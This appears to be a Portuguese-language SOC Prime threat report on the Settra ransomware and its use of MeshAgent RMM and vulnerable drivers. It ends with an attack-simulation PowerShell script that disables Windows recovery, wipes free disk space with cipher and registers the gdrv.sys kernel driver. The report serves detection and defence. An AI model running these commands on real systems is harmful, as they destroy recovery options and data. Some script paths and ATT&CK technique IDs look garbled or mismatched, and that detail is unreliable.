SOC Prime Bias: High

18 Sep 2026 15:12 UTC

Preparar, Settra, Ir: Nova Variante do Ransomware Settra Implanta MeshAgent RMM

Author Photo
SOC Prime Team linkedin icon Seguir
Preparar, Settra, Ir: Nova Variante do Ransomware Settra Implanta MeshAgent RMM
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

Settra é uma variante de ransomware recém-identificada, observada pela primeira vez em junho de 2026, que ganha acesso através de VPNs comprometidos ou credenciais roubadas. Os agentes de ameaça implantam o MeshAgent RMM para persistência e usam técnicas de Bring Your Own Vulnerable Driver (BYOVD) para contornar controles de segurança. Após estabelecer acesso, eles criptografam arquivos, desativam opções de recuperação e limpam logs de eventos do Windows.

Investigação

Huntress investigou dois incidentes separados de ransomware Settra afetando organizações nos setores de serviços ao consumidor, varejo e manufatura. Pesquisadores descobriram que os atacantes usaram executáveis de ransomware nomeados conforme o domínio da vítima e dependeram do MeshAgent RMM para comando e controle. Os analistas também observaram tentativas de limpar espaço livre em disco com o cipher utilitário e remover partições de recuperação usando diskpart.

Mitigação

Os defensores devem priorizar a segurança dos pontos de acesso remoto, como VPNs, e reforçar as proteções de credenciais para reduzir o risco de acesso inicial. Monitorar instalações de RMM não autorizadas e drivers vulneráveis conhecidos pode ajudar a identificar atividades mais precocemente. As organizações também devem fortalecer os ambientes de recuperação do Windows e proteger os logs de eventos contra manipulação não autorizada.

Resposta

Se a atividade do Settra for detectada, os endpoints afetados devem ser isolados imediatamente para impedir mais criptografias e movimentos laterais. Processos de RMM não autorizados como mvtcs.exe ou MeshAgent devem ser identificados e terminados. Os respondedores também devem revisar cuidadosamente os Logs de Eventos do Windows, levando em consideração tentativas de limpar registros ou abusar de nomes de logs com erros de digitação para evitar controles de exclusão.

Fluxo de Ataque

Ainda estamos atualizando esta parte.

Detecções

Execução Suspeita do Diretório PerfLogs (via process_creation)

Equipe SOC Prime
18 Set 2026

Possível Tentativa de Uso da Utilidade MeshAgent (via process_creation)

Equipe SOC Prime
18 Set 2026

IOCs (SourceIP) para detectar: Preparados, Settra, Vai: Nova Variante de Ransomware Settra Implanta MeshAgent RMM

Regras de IA da SOC Prime
18 Set 2026

IOCs (DestinationIP) para detectar: Preparados, Settra, Vai: Nova Variante de Ransomware Settra Implanta MeshAgent RMM

Regras de IA da SOC Prime
18 Set 2026

Atividades do Ransomware Settra com MeshAgent e BYOVD [Criação de Processo do Windows]

Regras de IA da SOC Prime
18 Set 2026

Execução de Simulação

  • Narrativa e Comandos de Ataque: O adversário conquistou acesso inicial e está preparando o sistema para uma carga de ransomware. Para garantir que a vítima não possa facilmente se recuperar ou realizar forense, o atacante executa uma série de comandos: primeiro, eles limpam o cache DNS para interromper quaisquer conexões existentes; segundo, eles desativam o Ambiente de Recuperação do Windows (reagentc) para evitar reparos automáticos; terceiro, eles tentam sobrescrever o espaço livre usando cipher para tornar a recuperação de dados impossível. Finalmente, eles tentam carregar um driver vulnerável (gdrv.sys) para escalar privilégios ao modo kernel. Esta sequência espelha a tentativa do ransomware Settra de maximizar o impacto e minimizar as opções de recuperação.

  • Script de Teste de Regressão:

    # Script de Simulação de Ransomware Settra
    Write-Host "[!] Iniciando Simulação de TTP de Ransomware Settra..." -ForegroundColor Red
    
    # 1. Simular Limpeza de Cache de DNS (T1070.004)
    Write-Host "[*] Executando: ipconfig /flushdns"
    Start-Process cmd.exe -ArgumentList "/c ipconfig /flushdns" -WindowStyle Hidden
    
    # 2. Simular Desativação de Recuperação (T1490)
    # Nota: Requer privilégios de Administrador
    Write-Host "[*] Executando: reagentc /disable"
    Start-Process cmd.exe -ArgumentList "/c reagentc /disable" -WindowStyle Hidden
    
    # 3. Simular Apagamento de Disco (T1600.002)
    # Nota: Esta é uma simulação; usamos um caminho fictício ou uma flag não destrutiva se possível, 
    # mas para acionar a regra, devemos usar 'cipher /w:'
    Write-Host "[*] Executando: cipher /w:C:"
    Start-Process cmd.exe -ArgumentList "/c cipher /w:C:" -WindowStyle Hidden
    
    # 4. Simular Carregamento de Driver BYOVD (T1068)
    # Simulamos a linha de comando usada para interagir com um driver como gdrv.sys
    Write-Host "[*] Simulando interação com o driver gdrv.sys"
    Start-Process cmd.exe -ArgumentList "/c copy gdrv.sys C:WindowsTempgdrv.sys" -WindowStyle Hidden
    Start-Process cmd.exe -ArgumentList "/c sc create MyVulnerableDriver binPath= C:WindowsTempgdrv.sys type= kernel" -WindowStyle Hidden
    
    Write-Host "[+] Simulação Completa. Verifique SIEM para alertas." -ForegroundColor Green
  • Comandos de Limpeza:

    # Limpar Artefatos de Simulação
    Write-Host "[!] Limpando simulação..." -ForegroundColor Yellow
    
    # Remover o serviço simulado
    sc.exe delete MyVulnerableDriver
    
    # Remover o arquivo de driver fictício
    Remove-Item -Path "C:WindowsTempgdrv.sys" -ErrorAction SilentlyContinue
    
    # Nota: Em um ambiente real, reagentc /enable seria usado para restaurar a recuperação, 
    # mas em um teste, certifique-se de que o administrador a restaure manualmente.
    Write-Host "[+] Limpeza concluída. Por favor, certifique-se de que a Recuperação do Windows esteja reabilitada manualmente, se necessário."